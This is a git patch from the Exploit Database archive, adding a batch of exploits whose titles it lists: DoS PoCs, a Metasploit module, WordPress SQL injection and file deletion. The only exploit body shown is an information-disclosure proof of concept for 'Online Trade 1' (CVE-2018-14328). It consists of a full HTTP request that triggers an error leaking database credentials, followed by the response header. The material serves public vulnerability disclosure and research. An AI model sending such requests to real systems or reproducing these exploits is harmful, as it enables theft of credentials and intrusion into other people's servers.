From 582d8f748e655cc917bf58efbe28236d6c48d380 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 28 Jul 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-07-28 6 changes to exploits/shellcodes QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC) NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC) Skia - Heap Overflow in SkScan::FillPath due to Precision Error WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit) Wordpress Background Takeover < 4.1.4 - Directory Traversal WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion WordPress Form Maker Plugin 1.12.24 - SQL Injection WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection WordPress Plugin Form Maker 1.12.24 - SQL Injection WordPress Plugin Contact Form Maker 1.12.20 - SQL Injection Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass) Online Trade 1 - Information Disclosure SoftNAS Cloud < 4.0.3 - OS Command Injection --- exploits/linux/webapps/45094.txt | 67 ++++++++++++ exploits/multiple/dos/45098.txt | 163 ++++++++++++++++++++++++++++++ exploits/php/remote/45099.rb | 159 +++++++++++++++++++++++++++++ exploits/php/webapps/45097.txt | 168 +++++++++++++++++++++++++++++++ exploits/windows/dos/45092.py | 25 +++++ exploits/windows/dos/45095.py | 25 +++++ files_exploits.csv | 16 ++- 7 files changed, 618 insertions(+), 5 deletions(-) create mode 100644 exploits/linux/webapps/45094.txt create mode 100644 exploits/multiple/dos/45098.txt create mode 100755 exploits/php/remote/45099.rb create mode 100644 exploits/php/webapps/45097.txt create mode 100755 exploits/windows/dos/45092.py create mode 100755 exploits/windows/dos/45095.py diff --git a/exploits/linux/webapps/45094.txt b/exploits/linux/webapps/45094.txt new file mode 100644 index 000000000..ed4e17864 --- /dev/null +++ b/exploits/linux/webapps/45094.txt @@ -0,0 +1,67 @@ +# Exploit Title: Online Trade 1 - Information Disclosure +# Exploit Author: Dhamotharan +# Date: 2018-07-17 +# Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14 +# CVE : CVE-2018-14328 +# Version: 1 +# Tested on: Kali Linux + +# Description : +# Brynamics "Online Trade - Online trading and cryptocurrency investment +# system" allows remote attackers to obtain sensitive information via a +# direct request for /dashboard/addplan, /dashboard/paywithcard/charge, +# /dashboard/withdrawal, or /privacy&terms, +# as demonstrated by reading database username, database password, +# database_name, and IP address. + +# POC: + +# Request: + +POST /dashboard/withdrawal HTTP/1.1 +Host: 127.0.0.1:8080 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; +Trident/5.0) +Connection: close +Referer: http://127.0.0.1:8080/dashboard/withdrawals +Content-Type: application/x-www-form-urlencoded +Content-Length: 112 +Cookie: +XSRF-TOKEN=eyJpdiI6IlAwSjE2SjE1REVUdTM0bXhsMDY1b3c9PSIsInZhbHVlIjoiN204 +d3RFcmdOSFVmTEo2cGh5bFlxY3RlR0p2U2hoN3NkNDZ5Vit3MjdpS3B2RHJG +aVFZdzlKNmFyN25RbWJLRnZtT3FaTDVvbHV4Ym9HMmFiWlhGY0E9PSIsIm1h +YyI6ImZmNTFhOGJkMmYxMTBlMGRjZDU4YzQ5MTI3NTljN2JiOGYyODc3MTEx +YjhjMzFiZTNkNWMzZjc5YjVlYTUyODEifQ%3D%3D; +laravel_session=eyJpdiI6IjZycklXVDNRTWsrT0NsZ3A2ZnIrWFE9PSIsInZhbHVlIjoiRzdC +VlJzXC81VWdSWHlkSys2K3dtR2h3UnpzZzhjT1wvdDZtZ3BOMXpjU09SMTJD +TGdXeEhSWkhadGt0RnhPRDR3MWZreXlLOTA1RDNIQStIZFpxRG5OZz09Iiwi +bWFjIjoiNTkwYzU3ZGMxOTg3NWU1ZWFjNjVjNjNkN2VjODkzYTBjZDI3MTAx +NWJmZTUzN2VhZDRlNzEyMDcyODk5ZmFlZiJ9; +__tawkuuid=e::trade.brynamics.xyz::3PC5vtdJoz40C7aJUDGFFuGkOrICf1 +3gr5+ReA6AWqfUvhPDsTAf982UcNP+u5nq::2; +TawkConnectionTime=0 + +amount=555-555-0199@example.com +&payment_mode=Bitcoin&method_id=2&_token= +VG4OwJ1Dxx0kDSA3JCp0JtHDMX3TI5WpXE6nTDWi + +# Response: + +HTTP/1.1 500 Internal Server Error +Date: Mon, 16 Jul 2018 11:14:58 GMT +Server: Apache +X-Powered-By: PHP/7.0.30 +Cache-Control: no-cache, private +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 708733 +